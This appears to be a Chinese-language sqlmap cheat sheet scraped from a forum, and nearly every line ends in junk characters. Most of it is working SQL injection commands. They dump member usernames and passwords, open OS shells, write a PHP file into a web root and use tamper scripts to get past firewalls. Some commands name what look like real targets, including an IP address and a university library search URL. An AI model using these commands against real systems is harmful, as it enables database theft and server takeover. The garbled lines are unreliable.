/pentest/database/sqlmap9 H* t; B( s! c' Y$ [, n
1 V: U _: p. {7 r
update :::::> in the folder after execute following order : svn update
7 q* y; h* _* U' K7 v- i' H* A" j* P( N
sqlmap.py -r 1.txt --current-db
7 c9 o) l. F {
6 r4 s* P) d* l, h8 Qv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”0 A* s0 l7 v, p, d
; B. @3 m0 L3 @0 p3 b r==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) % |" G. Q6 j/ m L
猜解数据库) z' ?( ~4 c) t( n2 r- J. L5 m
./sqlmap.py -u "injection-url" --dbs
. n0 @; e7 E" J+ Hsqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"1 w$ }3 Q+ b; v4 d
0 Z/ e9 j7 P8 i& f0 `3 `* G+ h猜解表名
; ]6 R. Y6 f l" R! D+ t./sqlmap.py -u "injection-url" -D database_name --tables. |8 r/ F9 J0 |' g/ X
|( m- [. x+ b* p
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"! s1 a9 g7 |- O+ |* Z! g
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
8 L; ]' q1 S. Q# i: U% f3 J
: D: C7 t5 ?: Z A# t. ssqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
! `& |3 g4 g! D9 F4 H( I3 b# E' s% ]+ s2 w7 I# g
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
8 q2 J: G6 o- g1 H; }% o- ksqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
* B( |- U- ^+ v, ?' H- x. f2 Wsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" ! H4 w" i5 O: P: j8 P
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"+ ~. ^+ G" ~+ ]
; C8 k) Q- P e) y. I% ]7 G, Q& Ksqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"+ X/ y: a6 Z- H; S- Z+ e: e* e
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"4 k8 ^( N7 v/ p G, V
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
7 Q, ~0 d8 @7 C; fsqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
2 M* v: ]1 k, {# Z9 qsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
V& H' f1 ]- X, l! c9 |' ^3 k- u5 R
sqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了0 N: j8 ~" m! ?! J4 t# [9 l
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
. ^6 A3 X( \) t+ u0 M4 j! w& f) |+ o( k
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
+ {4 u8 I4 q7 m7 d( ?1 F猜解列名
/ ^+ m1 s0 @8 X( T./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
4 X# g0 T' H! x$ Y2 I6 o
2 G+ e/ q: i3 r: u5 m$ Qsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" " O4 a0 g% B( w; x: s
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py" & n. L7 T2 ~8 X5 S. w
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"; }, i8 X5 B# o
L2 E0 T5 F- E% k
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
- A9 k6 {- g4 E4 M, O1 P4 M&submit=Go) `0 J& |( G4 b+ q8 u* t% z g, H
猜解值, h- i! z( ~. Q1 a$ E# B; w& F
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
; E6 n2 o3 t9 q5 R; W========================================================
& x9 E) E: E9 P2 P$ }: z! o搜索表名中包括mana字符的) {; Z5 `9 O3 B4 U! e& B
/sqlmap.py -u "injection-url" -T mana --search
3 q) w; h/ P* o j" b; }, K返回一个交互式sql shell" J; ? L- d4 r
/sqlmap.py -u "injection-url" --sql-shell
# e, h" Q* f9 d a% f" b读取指定文件(需权限)$ Z2 }, E5 ~! w. M; e1 {7 P+ n/ f
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini": K |3 O0 B& U
查看当前 用户 及 数据库
! A) o g4 ~% ?( x `/sqlmap.py -u "injection-url" --current-user --current-db! ^1 N6 H! F$ E* [4 w
本地文件 写入 远程目标绝对路径
; E% o* N6 _! Z' R) u+ E F/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径" }$ n! I) Z% R3 _
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" 8 @+ g3 g- w; T" W# `
G) m( M: i) y: U4 @* x( @
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
1 Q4 J) W) `! Y- h! \6 {查看某用的权限
" y' s" ^2 R$ ?9 P4 C: w% G/sqlmap.py -u "injection-url" --privileges -U root
% F8 F2 n( |( |: y6 c查看当前用户是否为dba7 s1 V- o; P9 A6 A* T
/sqlmap.py -u "injection-url" --is-dba- [. g6 j/ Y% l
读取所有数据库用户或指定数据库用户的密码* [2 I3 |, o" B
sqlmap.py -r 1.txt --users --passwords/ G3 x) Z; x8 A
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py" , ]3 M% K4 o. B
3 Y( s& Z, L* i/sqlmap.py -u "injection-url" --passwords -U root
_# J+ N4 w4 v) y
1 i- A/ n- v- b4 A+ ]--start&&--stop 与 --first&&--last 的区别
! o' D3 Q2 c, m! J6 o4 n/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
. A( s! m0 p1 g; z* h+ m( T3 N* O# U' M% d1 O9 L
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt): c5 \3 b$ z. i3 |; J$ @
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables, |% @0 \3 s$ x1 O$ G
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
( F5 p* ], ?9 p3 n0 N! c ~% f( z* u' i0 c% w/ N: u4 m. j
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
* {2 G$ g# O2 O1 J/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
2 }6 ^, v% \; [; ^
3 H5 ?( e1 m; t/ y+ D |